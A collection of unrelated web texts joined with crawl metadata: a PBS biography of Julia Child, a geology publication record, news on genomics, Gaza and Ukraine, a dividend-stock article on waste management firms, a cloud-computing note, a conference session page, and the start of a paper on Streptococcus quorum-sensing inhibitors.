go to the Near East. In March 1944, she set sail for Ceylon, now Sri Lanka, to work for the OSS office in the ancient city of Kandy. Here, far from home, she finally had her chance for adventure – and for love. But it was not love at first sight. Ten years older than Julia, Paul Child was an artist, a poet who had earned a black belt in judo, traveled the world, and spoke flawless French. Shortly after meeting Julia he wrote to his twin brother Charlie, that Julia was “wildly emotional” and “an extremely sloppy thinker” who was “unable to sustain ideas for long.” Julia, for her part, was disappointed in Paul, whom she described as having “light hair which is not on top, an unbecoming blond mustache and a long unbecoming nose.” But very slowly and over time, the two fell quietly in love. In the summer of 1946, they traveled across the country together, accompanied by 8 bottles of whiskey, a bottle of gin and a bottle of mixed martinis. Paul wrote to Charlie, “(Julia) never ‘puts on an act’, or creates a scene. . . She frankly likes to eat and use her senses and has an unusually keen nose.” In another letter he reported “She also washes my shirts! Quite a dame!” They were married that September. Paul, who worked for the State Department, was soon posted to France. En route to Paris, Paul took Julia to the oldest restaurant in the country, La Couronne. This was her first experience with classical French cuisine and she fell in love. “The whole experience was an opening up of the soul and spirit for me . . . I was hooked, and for life, as it turned out.” Eager to learn how to make this food, Julia enrolled in the famed Cordon Bleu. Between classes, she studied French and roamed the open air markets, talking with fish mongers, bakers and fruit sellers. She and Paul scoured the neighborhoods of Paris for friendly bistros, and under her husband’s patient tutelage, Julia’s palette grew more and more sophisticated. It was in Paris that Julia met two French women, Simca Beck and Louisette Bertholle, who were writing a cookbook aimed at an American audience. They needed an American collaborator. Julia was perfectly suited for the job. She began testing recipes. For nearly ten years, she devoted herself to writing, testing and re-writing. She confided to her sister-in-law: “Really, the more I cook the more I like to cook. To think it has taken me 40 yrs. To find my true passion (cat and husb. excepted).” Simca emerged as her principal collaborator. As Paul and Julia were posted from Paris to Marseilles to Bonn to Oslo and on to Washington, they kept up a furious correspondence, typing hundreds of letters with six carbon copies. Julia kept meticulous notes and spent months perfecting recipes for one ingredient. She made so many egg dishes that she finally wrote to Simca, “I’ve just poached two more eggs and throw them down the toilet.” When the women finally submitted their manuscript, the publisher turned it down. They made major revisions. Again, the publisher turned it down. “Hell and damnation,” Julia wrote to Simca. After repeated rejections, the book was finally picked up by a new publisher, Alfred Knopf and nurtured by a young and talented editor, Judith Jones. In 1961, Julia finally held in her hands the book titled “Mastering the Art of French Cooking.” It had taken ten long years of relentless toil to produce. But it was not clear how the book would be received in America. PBS and The French Chef Now living in Cambridge, Massachusetts, Julia would soon find out. She was invited to appear on a television program called “I’ve Been Reading”, produced by WGBH, Boston’s public television station. The host of the show was reluctant to take time for a subject as trivial as cooking. But Julia was undeterred. She arrived with a hot plate, giant whisk and eggs, and made an omelet. Twenty-seven viewers wrote to the station, wanting to see more. The station produced three pilots, then launched into production of The French Chef. Produced and directed by Russ Morash, the series broadcast a total of 199 programs, produced between 1963 and 1966. Julia’s timing was perfect. More and more Americans were traveling abroad. The Kennedys were in the White House. The majority of middle class women had not yet joined the work force; the bored housewife syndrome had not yet been diagnosed as a national malaise. For women who admired Jackie Kennedy chic, Julia’s translation of French cuisine offered a way to acquire a taste of French sophistication. Soon a nation fed mindlessly on Shake n’ Bake, RediWhip and Tang began experimenting with quiche Lorraine, boeuf bourgignon, and reine de saba. Upwardly mobile Americans who regarded cooking as a waste of time, were suddenly seizing whisks, molds and copper bowls, transforming the kitchen into the most important room in the house and making cooking a national pastime. On camera, Julia’s presence was relaxed, reassuring and informal. But behind the unpolished quirky charm was a driven perfectionist, convinced that there was a right and a wrong way to do things. Working closely with Paul and her associate producer Ruth Lockwood, Julia spent as many as 19 hours preparing for each half-hour segment. Detailed notes described every move she had to make. Her producer wrote out idiot cards that read “Stop gasping.” “Wipe brow.” The camera wore a helpful sign “Me camera.” The audience loved it. So did the critics. One newspaper called her “television’s most reliable female discovery since Lassie.” By the end of 1965, The French Chef was carried by 96 PBS stations. Sales of “Mastering the Art of French Cooking” were picking up speed – 200,000 copies sold. In 1965, Julia won a Peabody. In 1966, she won an Emmy. Time put her on the cover in a feature article on American food – “Everyone’s in the Kitchen.” In December 1966, Julia and Paul spent their first Christmas at La Pitchoune, a country house they built in Provence with royalties from the sales of “Mastering the Art of French Cooking.” Here they shopped for bread and meat at the local “boulanger.” They cured olives from their own trees. Around them, fields of roses and jasmine filled the air with perfume, along with violets and mimosa. For the next twenty years, Julia and Paul would escape to “La Peetch” as they called it. In this place, so reminiscent of California, Julia rested, worked and wrote. By Christmas 1967, she was busy correcting proofs of The French Chef Cookbook, based on the television series. Reveling in domestic bliss, Paul wrote to his brother: “How fortunate we are at this moment in our lives! Each doing what he most wants, in a marvelously adapted place, close to each other, superbly fed and housed, with excellent health, and few interruptions.” But Julia’s health was not good. “Left breast off,” she wrote in her date book for February 18, 1968. Back in Boston, a routine biopsy called for a full, radical mastectomy. She stayed ten days in the hospital. Paul was devastated by the specter of cancer and the fear that he might lose her. Julia was stoic. But released from the hospital, she crept into a bathtub and wept. Soon public tragedy eclipsed private sorrows. Martin Luther King was killed. Bobby Kennedy was shot. Julia and Paul, now back in France, heard the news on their tiny transistor radio. Julia was devastated. In Provence, the church bells tolled. Riots broke out at the Democratic convention in Chicago. The times recalled the poetic lament, “The center cannot hold.” Julia focused her energies on completing Volume II of “Mastering the Art of French Cooking.” “Rushing from stove to typewriter like a mad hen,” she wrote. She was determined that this book must be “better and different.” The publisher’s deadline was pushed back repeatedly. Once again, she was locked up in a room; she wrote to her friend Avis DeVoto: “I have no desire to get into another big book like Vol II for a long time to come, if ever. Too much work. I am anxious to get back into TV teaching, and out of this little room with the typewriter. Screw it.” She got her wish. In 1970, after a four year hiatus, Julia returned to film more episodes of “The French Chef” — this time in color. Commercial television had competed for her talents, but she refused to be bought. “I’ll stick with the educators,” she said. Fans packed her cooking demonstrations. Talk show hosts clamored to interview her. She appeared with the Boston Symphony. She was feted at the Four Seasons. By now Julia had become a celebrity, and Paul reveled in his wife’s success. But Paul was suffering from chest pains. He underwent a coronary bypass. During the surgery, he suffered several small strokes. The strokes had affected his brain. He completely lost his French and verbal fluency. “Whatever it is, I will do it,” Paul had said. He had acted as her manager, served as her photographer, tested her recipes, proof-read her books, and was content to let the light shine on her, not on him. Now, the man that Julia had counted on for so much would need her support in his struggle to survive. Julia gave freely and fully. She did not spend time lamenting their fate. She did what she always did in times of crisis. She moved on. But the world in which Julia moved was changing — Vietnam, Watergate and the resignation of Richard Nixon. So, too, was the world of food. By the 1970s, a new generation of younger chefs was tossing aside traditional ways, discovering American ingredients and experimenting with new approaches that stressed regional influences, strong flavors, and fresh ingredients. The classic French cuisine that Julia loved so well now seemed slightly quaint. Julia never gave up her fondness for the classic style, but she encouraged the new up-and-coming generation, including Boston-based chefs Jasper White and Gordon Hammersly. Traditionally, chefs had labored in obscurity, behind closed doors. Julia was determined to change this. She labored tirelessly to promote the profession, and as a result of her efforts, chefs began to receive the recognition they deserved. Now they emerged as celebrities and food became a form of entertainment. Seated at their tables, restaurant patrons could vicariously participate in unfolding drama of food preparation – bread pulled from brick ovens, chickens roasting on spits, vegetables tossed in open skillets. Julia was pleased that chefs were finally getting the attention they deserved, but she disliked the social snobbery that sometimes accompanied celebrity. She wrote to her friend and collaborator Simca Beck, “Food is getting too much publicity and is becoming too much of a status symbol and ‘in’ business.” Julia herself had shed what she called “the French straight jacket.” In her new series, Julia Child & Company and Julia and More Company, she moved with the times. In 1983, twenty years after the anniversary of The French Chef, Julia launched Dinner at Julia’s filmed at the Swank Hope Ranch, just outside Santa Barbara. Here she was cast in the role of a glamorous hostess, not the familiar, slightly eccentric cook that her fans had come to love. Many found the series disappointing and disconcerting. Julia seemed to shrug it off. She had made her mark. At this point most people would have been ready to retire. But not Julia. She wrote a big new cookbook, “The Way to Cook”, accompanied by a home video series. In her late 70s and 80s, she collaborated with a young talented director and producer, Geof Drummond, to make four new series — “Cooking with Master Chefs,” “In Julia’s Kitchen with Master Chefs,” “Baking with Julia,” and with her good friend Jacques Pépin, “Jacques and Julia at Home.” Each series was accompanied by a companion book. In 1992, Julia’s contribution to food and cooking in America was celebrated on the occasion of her 80th birthday. Three huge parties were held in her honor in Boston, Los Angeles and New York. Honors continued the following year, when Harvard University granted Julia an honorary doctorate. Her citation read “A Harvard friend and neighbor who has filled the air with common sense and uncommon scents. Long may her soufflés rise.” The audience responded with thunderous applause. Yet one person was not there to celebrate her success. Since 1989, Paul Child had been confined to a nursing home. His once robust body had grown frail and withered. On the evening of May 12, 1994, he passed away. For six more years, Julia continued to live alone in the house that she and Paul had shared. But she grew weary of New England winters and yearned for the warmth of the California sun. In November 2001, Julia moved to Santa Barbara. Her kitchen was moved to Washington, D.C. The place where she had chopped, stirred and sautéed for forty years is now on display at the Smithsonian Institution. Her pots and pans, her knives and kitchen tools proudly proclaim a culinary revolution that transformed the way that Americans cook, eat and think about food. Julia Child died just two days before her 92nd birthday, on August 13, 2004, surrounded by her family and friends. The nation mourned her passing, still remembering her with affection and fondness – not simply for her contribution to American cooking, but for who she was: a deeply generous person, open to experience, eager to learn and to teach. The young and restless woman who once mourned her lack of talent became an American icon, and in countless kitchens across the country and around the world, her spirit still lives on. Bon Appetit! To order a DVD of Julia Child! America’s Favorite Chef, please visit the American Masters Shop. Major funding for Julia! America’s Favorite Chef is provided by Feast it Forward. Major support for American Masters is provided by AARP. Additional funding is provided by the Corporation for Public Broadcasting, Rosalind P. Walter, The Philip and Janice Levin Foundation, Judith and Burton Resnick, Ellen and James S. Marcus, Vital Projects Fund, Lillian Goldman Programming Endowment, The Blanche & Irving Laurie Foundation, Cheryl and Philip Milstein Family, The André and Elizabeth Kertész Foundation, Michael & Helen Schaffer Foundation and public television viewers.
<urn:uuid:60ea7538-c9f2-43d9-b395-ee7e965d8c8c>
CC-MAIN-2022-33
https://www.pbs.org/wnet/americanmasters/julia-child-about-julia-child/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572304.13/warc/CC-MAIN-20220816120802-20220816150802-00468.warc.gz
en
0.981605
3,621
2.015625
2
USGS P 1399 Title:Stratigraphy and diagenetic alteration of Ellesmerian Sequence siliciclastic rocks, North Slope, Alaska Authors:van de Kamp, P.C. Publisher:U.S. Geological Survey Ordering Info:USGS Publications Warehouse Quadrangle(s):Barrow; Beechey Point; Harrison Bay; Meade River; Teshekpuk; Wainwright Keyword(s):Bedrock; Generalized; Geology; Structure Contours; van de Kamp, P.C., 1988, Stratigraphy and diagenetic alteration of Ellesmerian Sequence siliciclastic rocks, North Slope, Alaska, in Gryc, George, ed., Geology and exploration of the National Petroleum Reserve in Alaska, 1974 to 1982: U.S. Geological Survey Professional Paper 1399, p. 833-854, scale 1:1,000,000.
<urn:uuid:84926fe4-6cbd-4ded-bc29-150474590d4f>
CC-MAIN-2017-04
http://dggs.alaska.gov/pubs/id/4181
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00233-ip-10-171-10-70.ec2.internal.warc.gz
en
0.667351
205
1.820313
2
University of Washington Researchers Play Leading Role in Major Study of Human Genome Function 6/14/2007 1:37:11 AM Scientists at the University of Washington and other members of an international consortium have completed a multi-year research effort that dramatically boosts understanding of how the human genome functions. While previous studies of the human genome have focused mainly on genes, this study provides insight into the non-gene sequences making up the vast majority of the genome. Buried in non-gene sequences are so-called "regulatory elements" that contain instructions for switching genes on or off, and for controlling how DNA is packaged and replicated within a human cell. Scientists believe these DNA sequences may play a very important role in some diseases, such as prostate or colon cancer. comments powered by
<urn:uuid:522365f2-b1b1-48c7-9e30-46d04f442838>
CC-MAIN-2017-04
http://www.biospace.com/News/university-of-washington-researchers-play-leading/59985
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.60/warc/CC-MAIN-20170116095120-00468-ip-10-171-10-70.ec2.internal.warc.gz
en
0.932205
160
2.59375
3
Mali’sa is a student government officer at the Community College of Allegheny County (CCAC) and through her work with One Pittsburgh became a leader among students speaking out against tuition increases at CCAC and our state related universities. Mal’isa’s leadership helped students at CCAC fight off a mid-year hike in tuition, but she is all too aware that the war is far from over. She joined us in Alabama because speaking out has become second nature to her, and, I suspect, the time out of the classroom and into the sun was nice. At 19, Mali’sa hasn’t voted too often. But the thought of those rights being stripped from people has her infuriated. When I asked her what she thought about Pennsylvania passing voter legislation similar to the law we were protesting in Alabama, she had trouble finding words strong enough to capture her outrage. But she’ll be working this summer and beyond the make sure that people understand that voter ID laws affect everyone, not just folks who don’t have ID. When entire populations are left out of voting, elections become skewed, and those who are elected like those who are voting simply fail to represent the majority of Americans. That of course is the point, and the crime, of voter suppression. Since being home, Mali’sa has been playing catch up with school and plotting a student led revolution.
<urn:uuid:b0bc3a6d-5792-4d80-a52b-98bfdfd139df>
CC-MAIN-2017-04
http://onepittsburgh.org/malisa-branch/
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00223-ip-10-171-10-70.ec2.internal.warc.gz
en
0.983088
290
1.828125
2
By Ryan Fitzwater It's not a pretty business picking up the trash, but some one has to do it. And at the end of the day, it's good business. In the United States alone, we create more than 250 million tons of trash every year. And more than half of our waste ends up in landfills. With populations continuing to grow and consume more and more every year, we're producing more trash than ever before. This is good news for companies involved in the $52-billion waste management industry, as they're turning more trash into more profits. Profits that many then pass along to stockholders through dividends. The Kings of Trash While you might think that big money is made in the service side (literally picking up trash), it's actually found on the ownership side. Not ownership of the trash itself, but of the land used to store it. Owners of landfills that have a large amount of space left for trash (also known as airspace), have an advantage in the waste disposal business. An advantage that lets them collect big returns on what people throw out everyday. I tend to like sectors that have a strong advantage in down markets, and waste management is one of them. You can still collect quality dividends while everything else is tanking. The landfill industry was very resilient through the recent financial crises. While revenue growth stalled during the downturn, companies were still able to create strong cash flow and defend their dividends. Many dividend payers in other industries were freezing or cutting their dividends through the financial crises, while Republic Services and Waste Management continued to grow theirs. (Waste Connections, the youngest company of the three, didn't start paying a dividend until 2010.) And the "Three Kings of Trash" truly have an advantage over competitors (or would be competitors). They have extensive experience in working regulatory hurdles. Squeezing Out the Competition I'm sure any CEO in the waste management business would be able to list countless unnecessary regulations that hurt their business. But extensive regulations also give the established players a big advantage. The landfill industry is highly regulated. It entails constant investment to remain compliant. Growing environmental regulations have made it more and more costly to operate and own landfills. It requires large amounts of capital to construct, organize and monitor sites. And permits today require 30 years of environmental monitoring after a landfill closes. This is a major financial commitment that has to be planned well in advance. The final price tag on a landfill… about $1 million per acre to construct, operate and finally close in ordinance with regulations. With the amount of capital required to operate landfills coupled with a dumpster of regulations, new players in the game have a tough time breaking into the market and finding their feet. That's why industry revenue is driven to the established kings of the industry, while smaller competitors sit on the sidelines. Taking Out the Trash Let's take a look at the chart below to help decide which of the Three Kings of Trash stand to benefit investors the most: Based on the chart above, I'd be more inclined to pick up shares of Waste Connections first and then Republic Services - leaving Waste Management out on the curb. While Waste Management does have the highest dividend yield and return on equity (something all investors should consider when researching a stock) it clearly has some other issues that raise a red flag. First, it has a high debt-to-equity ratio of 151.97%. This means that creditors currently have more money in the company than stockholders have. Not a good sign. Second it has a high dividend payout ratio of 96.06%. And yes, some can argue that they prefer companies with a higher dividend payout ratio since it means investors are receiving a higher amount of earnings. But I tend to agree with Investment U income expert Marc Lichtenfeld. A payout ratio (preferably based on cash flow rather than earnings) of 75% or less means a company can reinvest its cash back into the business to fuel future growth. Not to mention as the payout ratio approaches 100%, it signals that the dividend payments are in jeopardy of being cut. Waste Management also has the lowest operating and profit margins of the three kings. And it has the highest price-to-book ratio of 2.52. The other kings sit at much more attractive levels of 1.28 and 2.20. And Waste Management only grew earnings 3.54% year-over-year in its latest quarter, while Republic Services and Waste Connections both had earnings growth in the double digits. Of course those who are interested in the best yielding stock can still consider Waste Management. Over the past five years it has grown its dividend 8.85%. But once again, it placed below its competitor Republic Services, which grew its dividend 15.78% over the same period of time. Our stock breakdown winner, Waste Connections, has only been paying its dividend since 2010, so we can't calculate a five-year dividend growth rate. And it does have the lowest yield of 1.14%. But it has a one-year dividend growth rate of 53.33% and will likely continue to grow its dividend in the future. Get Your Fill of Landfills Investors should consider exposing themselves to the landfill market. It's one that should continue to offer steady cash flow and dividends as our trash piles up, even in a down market. And as I mentioned above, the three kings have established operations and hold higher ground over smaller players. I would just be more inclined to pick up share of Waste Connections or Republic Services over Waste Management. I believe they have more room to grow their bottom lines and their dividends in the future. Disclosure: Investment U expressly forbids its writers from having a financial interest in any security they recommend to our subscribers. All employees and agents of Investment U (and affiliated companies) must wait 24 hours after an initial trade recommendation is published on online - or 72 hours after a direct mail publication is sent - before acting on that recommendation.
<urn:uuid:77966be1-1806-46a7-bef0-d494d62089e3>
CC-MAIN-2017-04
http://seekingalpha.com/article/604571-the-top-3-dividend-paying-waste-management-stocks
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280929.91/warc/CC-MAIN-20170116095120-00425-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962613
1,230
2.078125
2
UNITED NATIONS, March 13 (Xinhua) -- A Chinese envoy stressed here on Thursday that the ongoing Ukraine crisis should be resolved through political and diplomatic means so as to avoid further escalation of the tension. Liu Jieyi, China's permanent representative to the United Nations, made the remarks at a Security Council meeting on the situation in Ukraine. "China has been following closely the development of the situation on the ground," which remains "highly complex and sensitive," said Liu. "What we are seeing today in Ukraine is the result of a complex intertwinement of historical and contemporary factors," he said, adding that China condemns the recent extreme and violent acts there. The envoy stressed China's objective and fair position on the Ukraine issue. It is China's long-standing position not to interfere in others ' internal affairs and respect others' sovereignty and territorial integrity, he said. "It is the first priority for all parties concerned to exercise calm and restraint and prevent further escalation of the tension," Liu said, insisting that a solution be found "through political and diplomatic means", while the legitimate rights and interests of all ethnic groups in Ukraine be fully ensured. "We hope that all parties concerned would appropriately tackle the differences through communication and coordination in the fundamental interests of all ethnic groups in Ukraine and the overall interests of regional peace and stability," he said. China supports the constructive efforts and good offices of the international community to de-escalate the situation in Ukraine, and is open to any proposals and suggestions that could help ease the tension, the envoy added. "We will continue to play a constructive role in bringing about a political settlement of the Ukrainian issue," he said.
<urn:uuid:0b594ceb-e7f2-4e0e-873a-f4cc195df737>
CC-MAIN-2017-04
http://news.xinhuanet.com/english/china/2014-03/14/c_133184727.htm
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00208-ip-10-171-10-70.ec2.internal.warc.gz
en
0.957248
344
1.835938
2
Cluster Compute Instances provide a high-performance network interconnect along with a high-performance CPU. For example, the cc2.8xlarge instance type has quad-core processors with hyper-threading enabled (8 physical cores with 16 threads). When these instances are grouped together and launched in the context of an EC2 Placement Group, the instances benefit from a high bandwidth, non-blocking interconnect system, which makes them ideal for applications that require lots of network I/O. (e.g. High Performance Compute (HPC) applications and other demanding network-bound applications) Be sure to reference Amazon's documentation for current limitations. See Cluster Compute Instance Concepts. © 2006-2014 RightScale, Inc. All rights reserved. RightScale is a registered trademark of RightScale, Inc. All other products and services may be trademarks or servicemarks of their respective owners.
<urn:uuid:1c0ccc6a-3eef-445e-8c12-b18984f73847>
CC-MAIN-2017-04
http://support.rightscale.com/09-Clouds/AWS/02-Amazon_EC2/Cluster_Compute_Instances/index.html
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280266.9/warc/CC-MAIN-20170116095120-00493-ip-10-171-10-70.ec2.internal.warc.gz
en
0.855068
188
1.6875
2
Building and Scaling Human-Centered Citizen Experiences–Keys for Success Sponsored by IBM Watson Health Wednesday, December 11 2:45 pm – 3:45 pm Offering Leader – IBM Social Program Management, IBM Watson Health Legislation, recommendations, and citizen demand tell us that great digital services are consistent, user friendly, and available online from any device. What does it take to make this a reality? Hear practical advice for business and technical leaders based on the lessons learned building and scaling multi-program portals used by government agencies in states, counties, and globally. Why are some States using native web apps for citizen engagement, some using responsive web applications, and some both? What is a Design System, and why is it not enough on its own to deliver great online services? How do you balance build vs. buy decisions for citizen portals? These questions and more are addressed in this session. U.S Federal government customer satisfaction declined in 2018. Why? As with most things, it’s complex…but long wait times, poor office experiences, and difficult-to-use technology all contribute to citizens feeling like governments don’t value them or their time, or treat them with fairness and respect. One of the impacts of this is reduced engagement between citizens and their government. In fact, research suggests that this might explain why people receiving benefits are less likely to vote. To tackle this, governments are prioritizing inclusive, accessible public services. They’re involving their citi zens in the process of designing those services. And they’re promoting digital as the default channel for engaging with government through their own digital strategies. And yet, while by many measures eGovernment is strengthening globally, there’s still a huge distance to travel. The US Federal Government spends 11.4 billion hours annually, processing paper forms. Almost half of US states don’t have an online portal for benefits applications designed for use on a mobile device. But building great digital services is not easy. Using examples both good and not so good, this session explores the business, technical and operational challenges for any Government organization looking to take applications for services online, and suggests strategies for dealing with them. About GTS Educational Events If you are a nonprofit or public sector group looking to create a conference, workshop or educational event with impact, look to GTS. We believe educational events are successful when participants learn and grow and then return to their organizations and communities to make them stronger. We look forward to continuing our work with the broad spectrum of organizations striving to make a difference for the people and communities they serve. Alex Hepp, City of Hopkins Bill Bleckwehl, Cisco Dave Andrews, DEED Jay Wyant, Minnesota IT Services Jim Hall, Ramsey County Matt Bailey, IBM Melissa Reeder, League of Minnesota Cities Nathan Beran, City of New Ulm Sue Wallace, IT Futures Foundation Lisa Meredith, Minnesota Counties Computer Cooperative Justin Kaufman, Minnesota IT Services Renee Heinbuch, Washington County/MNCITLA Jerine Rosato, Ramsey County David Berthiaume, Minnesota IT Services Cory Tramm, Sourcewell Tech Tomas Alvarez, Federal Reserve Tom Ammons, MN.IT – Central Dave Andrews, MN State Services for the Blind Susan Bousquet, MN.IT – DOT Robert Granvin, Metro State Alex Hepp, City of Hopkins Shawntan Howell, Ramsey County Jenny Johnson, Metropolitan Council Millicent Kasal, MN.IT – Central Ping Li, MN.IT – MMB Chibuzor Nnaji, MN.IT – DHS Mehrdad Shabestari, MN.IT – Central
<urn:uuid:f420f9ef-c530-4e83-8bd8-49a1e29e1feb>
CC-MAIN-2022-33
https://fusionlp.org/itsym21/session85/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572833.95/warc/CC-MAIN-20220817032054-20220817062054-00465.warc.gz
en
0.899668
825
1.539063
2
Israel-Gaza ceasefire: Negotiators look to next phase for peace Gaza celebrates 'victory' over Israel, but Hamas demands for open borders still unmet Israel and Gaza's ruling Hamas agreed Tuesday to an open-ended ceasefire after seven weeks of fighting — an uneasy deal that halts the deadliest war the sides have fought in years, with more than 2,200 killed, but puts off the most difficult issues. Hamas declared victory, even though it had little to show for a war that killed 2,143 Palestinians, wounded more than 11,000 and left some 100,000 homeless. On the Israeli side, 64 soldiers and six civilians were killed, including two killed by Palestinian mortar fire shortly before the cease-fire was announced. Large crowds gathered in Gaza City after the truce took effect at dusk, some waving the green flags of Hamas, while celebratory gunfire and fireworks erupted across the territory. Mahmoud Zahar, a senior Hamas leader, promised to rebuild homes destroyed in the war and said Hamas would rearm. "We will build and upgrade our arsenal to be ready for the coming battle, the battle of full liberation," he declared, surrounded by Hamas gunmen. The Israeli response was more subdued. Complex talks to begin in one month "This time we hope the cease-fire will stick," said Israeli government spokesman Mark Regev. He portrayed the deal as one Hamas had rejected in previous rounds of negotiations. Israeli Prime Minister Benjamin Netanyahu faced some criticism from hard-line critics and residents of Israeli communities near Gaza who said the deal failed to defuse the threat from Gaza militants. Since July 8, Hamas and its allies have fired some 4,000 rockets and mortars at Israel, and tens of thousands of Israelis evacuated areas near Gaza in recent weeks. Under the Egyptian-brokered deal, Israel is to ease imports into Gaza, including aid and material for reconstruction. It also agreed to a largely symbolic gesture, expanding a fishing zone for Gaza fishermen from three to six nautical miles into the Mediterranean. "As soon as calm is restored, the delivery of urgently needed humanitarian assistance to the people in Gaza must be accelerated," U.S. Secretary of State John Kerry said in a statement. Canada's Foreign Affairs Minister John Baird "cautiously" welcomed the ceasefire and reiterated focusing on the needs of Gaza residents. “Palestinians in Gaza have suffered greatly under Hamas’s reign, and it is high time that their needs are put first over their rulers’ blind ambition," he said in a statement. In a month, talks are to begin on more complex issues, including Hamas' demand to start building a seaport and airport in Gaza. Israel has said it would only agree if Hamas disarms, a demand the militant group has rejected. Kerry said the U.S. will continue engaging in those talks. "We are approaching the next phase with our eyes wide open," Kerry's statement reads. "Certain bedrock outcomes ... are essential if there is to be long term solution for Gaza." The cease-fire went into effect at 7 p.m. local time (noon ET) Tuesday, and violence persisted until the last minute. About an hour before the cease-fire, 12 mortar shells hit an Israeli communal farm near Gaza, killing two Israelis and wounding seven other people, two of them critically, the Israeli military said. Between 5 p.m. and 7 p.m., Gaza militants fired 83 rockets, of which 13 were intercepted. In Gaza, an Israeli airstrike minutes before the start of the cease-fire toppled a five-story building in the town of Beit Lahiya, witnesses said. Twelve Palestinians, including two children, were killed in several Israeli airstrikes before the truce took hold, Gaza police said. In Gaza City, a 20-year-old woman was killed and several dozen people were wounded by celebratory gunfire after the truce was announced. Palestinian President Abbas to play key role Throughout the war, Israel launched some 5,000 airstrikes against Gaza, saying it targeted sites linked to militants, including rocket launchers and weapons depots. About three-fourths of those killed in the strikes have been civilians, according to the U.N. and Palestinian officials. In recent days, Israel had stepped up its pressure on Hamas, toppling five towers containing offices, apartments and shops since Saturday. Two of those buildings were brought down in airstrikes early Tuesday that destroyed dozens of apartments and shops. Despite its victory celebrations Tuesday, Hamas failed to force an end to the Gaza blockade, imposed by Israel and Egypt after the Islamic militants seized the seaside strip in 2007. Under the restrictions, virtually all of Gaza's 1.8 million people cannot trade or travel. Only a few thousand are able to leave the coastal territory every month. The ceasefire deal makes no mention of ending the ban on exports from Gaza or significantly easing travel. A spokesperson for United Nations Secretary General Ban Ki-moon welcomed the ceasefire announcement and said any violations would be "utterly irresponsible," in a statement released Tuesday. "Any peace effort that does not tackle the root causes of the crisis will do little more than set the stage for the next cycle of violence," the statement warns. The UN statement also said Gaza must be brought back under one legitimate Palestinian government. Palestinian President Mahmoud Abbas, a long-time rival of Hamas, likely will play a key role in any new border deal for Gaza. Abbas lost control of Gaza after Hamas seized the territory in 2007. He is expected to regain a foothold there under the Egyptian-brokered agreement. Forces loyal to Abbas would be posted at Gaza's crossings to allay fears by Israel and Egypt about renewed attempts by Hamas to smuggle weapons into the territory. Israel is also concerned that material for reconstruction would be diverted by Hamas for military purposes. In a televised address Tuesday night, Abbas said the end of the war underscored the need to find a permanent solution to the conflict with Israel. "What's next? Gaza has been subjected to three wars. Shall we expect another war in a year or two? Until when will this issue be without a solution?" he asked. Aides have said Abbas plans to ask the UN Security Council to demand Israel's withdrawal from all lands captured in the 1967 Mideast war to make way for an independent Palestinian state. Abbas alluded to the plan in his speech. "Today, I'm going to give the Palestinian leadership my vision for a solution and after that we will continue consultations with the international community," he said. "This vision must be clear and well defined and we are not going to an open-ended negotiation." - An earlier version of this story reported wrongly that a ceasefire announcement would be made in Cairo at 1 p.m. ET. In fact, the time was set for noon ET, Reuters reported, correcting an previous headline.Aug 26, 2014 11:40 AM ET
<urn:uuid:6a00e7c8-7084-4705-a0ac-af1777023de1>
CC-MAIN-2022-33
https://www.cbc.ca/news/world/israel-gaza-ceasefire-negotiators-look-to-next-phase-for-peace-1.2746874
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573908.30/warc/CC-MAIN-20220820043108-20220820073108-00264.warc.gz
en
0.969304
1,428
1.664063
2
The main components of the quorum-sensing system are expected to be favorable targets for drug development to combat various chronic infectious diseases. ComA of Streptococcus is an ATP-binding cassette transporter containing a peptidase domain (PEP), which is essential for the quorum-sensing signal production. Using high-throughput screening, we found a potent small molecule that suppressed the S. mutans quorum-sensing pathway through inhibition of PEP activity. The compound effectively attenuated the biofilm formation and competence development of S. mutans without inhibiting cell growth. The kinetic and structural studies with this molecule and a related compound unexpectedly revealed an allosteric site of PEP. This relatively hydrophobic site is thought to undergo large structural changes during the catalytic process. These compounds inhibit PEP activity by binding to and suppressing the structural changes of this site. These results showed that PEP is a good target for inhibitors of the Streptococcus quorum-sensing system. Streptococcus is a genus of Gram-positive bacteria that consists of a wide variety of pathogenic and commensal species. Some commensal species are known to be opportunistic pathogens. Notably, oral streptococci, such as S. mutans, are not only cariogenic but also occasionally enter the human circulatory system and cause life-threatening infective endocarditis by forming a biofilm on the native or prosthetic heart valves, especially in patients from Asia1, 2. Formation of the biofilm, together with its inherent resistance to antibiotics, is the main factor in the chronic and refractory nature of this infection3. Generally, bacterial biofilm formation is thought to be regulated by the quorum-sensing system4. The quorum-sensing system is a bacterial cell–cell signal communication system mediated by an inherent signal molecule called an autoinducer5. The ComABCDE pathway is the quorum-sensing system in some species of Streptococcus, such as S. mutans and S. pneumoniae, in which autoinducer peptides are processed from the precursor ComC and concomitantly exported to the extracellular space by ComA and ComB6, 7. The accumulated autoinducers bind to the membrane-bound receptor kinase ComD, which subsequently phosphorylates the response regulator ComE to activate transcription of a specific set of genes, such as those essential for the competence development in S. mutans 6, S. pneumoniae 7, 8, and S. gordonii 9 and the biofilm formation in S. mutans 10 and S. pneumoniae 11. It is expected that inhibitor development against this system would provide a way to design drugs for various clinical conditions caused by chronic biofilm infections. One purported benefit of quorum-sensing inhibitors is that, because they do not directly kill bacterial cells, they should exert lower selection pressure and, hence, be less susceptible to development of drug resistance than are antimicrobials12. ComA is a bi-functional ATP-binding cassette (ABC) transporter that comprises three domains: an N-terminal peptidase domain (PEP), a transmembrane domain, and a C-terminal nucleotide-binding domain13,14,15. PEP is a highly specific peptidase belonging to a cysteine protease family13, 16,17,18. We have previously elucidated the substrate recognition mechanism of PEP17, 18 in which the tight cleft at the active site of PEP binds the Gly–Gly motif of ComC and a shallow hydrophobic concave surface of PEP accommodates the conserved hydrophobic residues in the N-terminal α-helical region of ComC (Fig. 1A). Understandably, development of inhibitors for the quorum-sensing system of Gram-positive bacteria has mainly targeted the signal–receptor interaction, that 